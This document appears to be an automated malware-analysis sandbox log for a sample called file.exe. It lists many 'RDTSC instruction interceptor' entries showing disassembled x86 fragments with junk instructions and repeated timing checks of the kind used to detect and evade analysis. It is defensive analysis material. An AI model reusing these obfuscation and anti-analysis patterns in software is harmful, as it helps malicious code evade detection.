Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70728 second address: 4C6001D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a retn 0004h 0x0000000d nop 0x0000000e cmp eax, 00000000h 0x00000011 setne al 0x00000014 xor ebx, ebx 0x00000016 test al, 01h 0x00000018 jne 00007F02B8F275E7h 0x0000001a xor eax, eax 0x0000001c sub esp, 08h 0x0000001f mov dword ptr [esp], 00000000h 0x00000026 mov dword ptr [esp+04h], 00000000h 0x0000002e call 00007F02BD780A23h 0x00000033 mov edi, edi 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F02B8F275F9h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6001D second address: 4C600F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F2D491h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F02B8F2D48Eh 0x0000000f push eax 0x00000010 jmp 00007F02B8F2D48Bh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007F02B8F2D496h 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F02B8F2D48Eh 0x00000024 jmp 00007F02B8F2D495h 0x00000029 popfd 0x0000002a push eax 0x0000002b mov dx, 7202h 0x0000002f pop ebx 0x00000030 popad 0x00000031 push FFFFFFFEh 0x00000033 pushad 0x00000034 push esi 0x00000035 call 00007F02B8F2D48Bh 0x0000003a pop esi 0x0000003b pop edi 0x0000003c jmp 00007F02B8F2D496h 0x00000041 popad 0x00000042 call 00007F02B8F2D489h 0x00000047 pushad 0x00000048 push esi 0x00000049 push ebx 0x0000004a pop eax 0x0000004b pop edi 0x0000004c jmp 00007F02B8F2D496h 0x00000051 popad 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F02B8F2D48Eh 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C600F1 second address: 4C60127 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F02B8F275F1h 0x00000008 mov dx, si 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jmp 00007F02B8F275EDh 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a mov dx, 2F82h 0x0000001e push eax 0x0000001f push edx 0x00000020 push ebx 0x00000021 pop esi 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60127 second address: 4C60180 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F02B8F2D495h 0x00000008 and cx, 1B56h 0x0000000d jmp 00007F02B8F2D491h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F02B8F2D48Ah 0x00000023 adc ecx, 7A8ABD78h 0x00000029 jmp 00007F02B8F2D48Bh 0x0000002e popfd 0x0000002f pushad 0x00000030 popad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60180 second address: 4C60232 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F02B8F275F5h 0x00000008 call 00007F02B8F275F0h 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pop eax 0x00000012 pushad 0x00000013 push edi 0x00000014 mov ax, 60D9h 0x00000018 pop eax 0x00000019 pushfd 0x0000001a jmp 00007F02B8F275EFh 0x0000001f adc ch, 0000004Eh 0x00000022 jmp 00007F02B8F275F9h 0x00000027 popfd 0x00000028 popad 0x00000029 push FB88FE7Fh 0x0000002e pushad 0x0000002f jmp 00007F02B8F275EDh 0x00000034 mov esi, 76EEEC47h 0x00000039 popad 0x0000003a add dword ptr [esp], 7B0C2CF1h 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 mov ax, bx 0x00000047 pushfd 0x00000048 jmp 00007F02B8F275EBh 0x0000004d xor cl, 0000000Eh 0x00000050 jmp 00007F02B8F275F9h 0x00000055 popfd 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60232 second address: 4C60238 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60238 second address: 4C6023C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6023C second address: 4C60240 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60240 second address: 4C60268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000000h] 0x0000000e jmp 00007F02B8F275EFh 0x00000013 nop 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 movsx edx, si 0x0000001a mov dx, si 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60268 second address: 4C6026E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6026E second address: 4C60272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60272 second address: 4C60297 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F02B8F2D498h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60297 second address: 4C6029D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6029D second address: 4C602CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F2D48Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F02B8F2D490h 0x0000000f sub esp, 18h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push edx 0x00000018 pop esi 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C602CB second address: 4C60341 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F02B8F275EEh 0x00000009 xor cx, BA08h 0x0000000e jmp 00007F02B8F275EBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F02B8F275EBh 0x00000021 jmp 00007F02B8F275F3h 0x00000026 popfd 0x00000027 pushfd 0x00000028 jmp 00007F02B8F275F8h 0x0000002d sub esi, 6C4AAEC8h 0x00000033 jmp 00007F02B8F275EBh 0x00000038 popfd 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60341 second address: 4C60347 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60347 second address: 4C6034B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6034B second address: 4C6034F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6034F second address: 4C60362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop eax 0x0000000e mov bx, 8C1Ah 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60362 second address: 4C603B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F2D490h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F02B8F2D490h 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 movsx edi, cx 0x00000016 pushfd 0x00000017 jmp 00007F02B8F2D496h 0x0000001c or cx, 45E8h 0x00000021 jmp 00007F02B8F2D48Bh 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C603B7 second address: 4C60433 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F02B8F275EFh 0x00000009 and ax, 952Eh 0x0000000e jmp 00007F02B8F275F9h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a jmp 00007F02B8F275F7h 0x0000001f xchg eax, esi 0x00000020 jmp 00007F02B8F275F6h 0x00000025 xchg eax, edi 0x00000026 pushad 0x00000027 mov ecx, 4AF3F1DDh 0x0000002c movzx esi, dx 0x0000002f popad 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 movsx edi, cx 0x00000037 movzx eax, di 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60433 second address: 4C60439 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60439 second address: 4C6043D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6043D second address: 4C604E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 pushad 0x0000000a movzx ecx, bx 0x0000000d jmp 00007F02B8F2D495h 0x00000012 popad 0x00000013 mov eax, dword ptr [769B4538h] 0x00000018 pushad 0x00000019 mov dx, ax 0x0000001c popad 0x0000001d xor dword ptr [ebp-08h], eax 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F02B8F2D48Bh 0x00000027 and al, 0000000Eh 0x0000002a jmp 00007F02B8F2D499h 0x0000002f popfd 0x00000030 push ecx 0x00000031 pushfd 0x00000032 jmp 00007F02B8F2D497h 0x00000037 sub ah, 0000001Eh 0x0000003a jmp 00007F02B8F2D499h 0x0000003f popfd 0x00000040 pop eax 0x00000041 popad 0x00000042 xor eax, ebp 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F02B8F2D493h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C604E6 second address: 4C604FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F02B8F275F4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C604FE second address: 4C60551 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F2D48Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov edi, 3E0CA066h 0x00000014 pushfd 0x00000015 jmp 00007F02B8F2D497h 0x0000001a add eax, 10D1CAEEh 0x00000020 jmp 00007F02B8F2D499h 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60551 second address: 4C60558 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60558 second address: 4C6057E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F02B8F2D498h 0x0000000d nop 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6057E second address: 4C60588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, 6A4315AEh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60588 second address: 4C605BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F2D494h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c jmp 00007F02B8F2D490h 0x00000011 mov dword ptr fs:[00000000h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C605BF second address: 4C605C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C605C5 second address: 4C60600 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, ah 0x00000005 movsx edx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [ebp-18h], esp 0x0000000e pushad 0x0000000f mov ecx, 4328412Bh 0x00000014 mov ecx, 4567C507h 0x00000019 popad 0x0000001a mov eax, dword ptr fs:[00000018h] 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F02B8F2D499h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60600 second address: 4C60650 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F275F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [eax+00000FDCh] 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F02B8F275ECh 0x00000016 adc esi, 245F7E48h 0x0000001c jmp 00007F02B8F275EBh 0x00000021 popfd 0x00000022 mov ah, 91h 0x00000024 popad 0x00000025 test ecx, ecx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F02B8F275EEh 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60650 second address: 4C606A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F02B8F2D491h 0x00000008 pop esi 0x00000009 mov dh, 25h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jns 00007F02B8F2D4D9h 0x00000014 pushad 0x00000015 pushad 0x00000016 movzx esi, bx 0x00000019 push ebx 0x0000001a pop eax 0x0000001b popad 0x0000001c pushfd 0x0000001d jmp 00007F02B8F2D48Dh 0x00000022 or ax, 7B76h 0x00000027 jmp 00007F02B8F2D491h 0x0000002c popfd 0x0000002d popad 0x0000002e add eax, ecx 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 mov ecx, edx 0x00000035 mov si, dx 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C606A9 second address: 4C606AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C606AF second address: 4C606B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C606B3 second address: 4C606E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F275EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, dword ptr [ebp+08h] 0x0000000e jmp 00007F02B8F275F0h 0x00000013 test ecx, ecx 0x00000015 pushad 0x00000016 mov al, 5Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a mov di, 663Ch 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C501E7 second address: 4C50221 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b movsx ebx, ax 0x0000000e pushfd 0x0000000f jmp 00007F02B8F2D498h 0x00000014 and ecx, 7E1462F8h 0x0000001a jmp 00007F02B8F2D48Bh 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50221 second address: 4C50227 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50227 second address: 4C5022B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C5022B second address: 4C5022F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C5022F second address: 4C5023F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C5023F second address: 4C50243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50243 second address: 4C5025B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F2D494h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C5025B second address: 4C50277 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 8934h 0x00000007 mov bl, 04h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c sub esp, 2Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F02B8F275EBh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50277 second address: 4C502A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F2D499h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F02B8F2D48Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C502A4 second address: 4C502AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C502AA second address: 4C502AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C502AE second address: 4C502CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F02B8F275F0h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C502CB second address: 4C502D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C502D1 second address: 4C5031E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F275EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov edi, 3559D8F0h 0x00000012 pushfd 0x00000013 jmp 00007F02B8F275F9h 0x00000018 add cx, 9676h 0x0000001d jmp 00007F02B8F275F1h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C5031E second address: 4C5032E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F02B8F2D48Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C5032E second address: 4C50332 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50374 second address: 4C503AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov dx, 5058h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebx, 00000000h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushfd 0x00000015 jmp 00007F02B8F2D494h 0x0000001a and eax, 71D2DAB8h 0x00000020 jmp 00007F02B8F2D48Bh 0x00000025 popfd 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C503AF second address: 4C503F4 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F02B8F275F8h 0x00000008 or si, 1518h 0x0000000d jmp 00007F02B8F275EBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 sub edi, edi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F02B8F275F2h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C503F4 second address: 4C503FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C503FA second address: 4C50409 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 inc ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50409 second address: 4C5041B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F2D48Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C5049B second address: 4C504BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ebx, eax 0x00000008 popad 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F02B8F275F7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C504BE second address: 4C504C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C504C4 second address: 4C504C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C5050E second address: 4C50557 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F2D48Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov eax, edx 0x00000010 pushfd 0x00000011 jmp 00007F02B8F2D499h 0x00000016 or al, 00000016h 0x00000019 jmp 00007F02B8F2D491h 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50557 second address: 4C50567 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F02B8F275ECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50567 second address: 4C505BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F2D48Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007F032AC3B39Ah 0x00000011 jmp 00007F02B8F2D496h 0x00000016 js 00007F02B8F2D4FCh 0x0000001c jmp 00007F02B8F2D490h 0x00000021 cmp dword ptr [ebp-14h], edi 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F02B8F2D48Ah 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C505BB second address: 4C505C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C505C1 second address: 4C505C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C505C6 second address: 4C5062C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F032AC354B2h 0x0000000f pushad 0x00000010 call 00007F02B8F275F4h 0x00000015 pushfd 0x00000016 jmp 00007F02B8F275F2h 0x0000001b sub ah, FFFFFF88h 0x0000001e jmp 00007F02B8F275EBh 0x00000023 popfd 0x00000024 pop esi 0x00000025 mov ah, bh 0x00000027 popad 0x00000028 mov ebx, dword ptr [ebp+08h] 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F02B8F275F7h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C5062C second address: 4C50652 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F2D499h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-2Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50652 second address: 4C50656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50656 second address: 4C5065C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
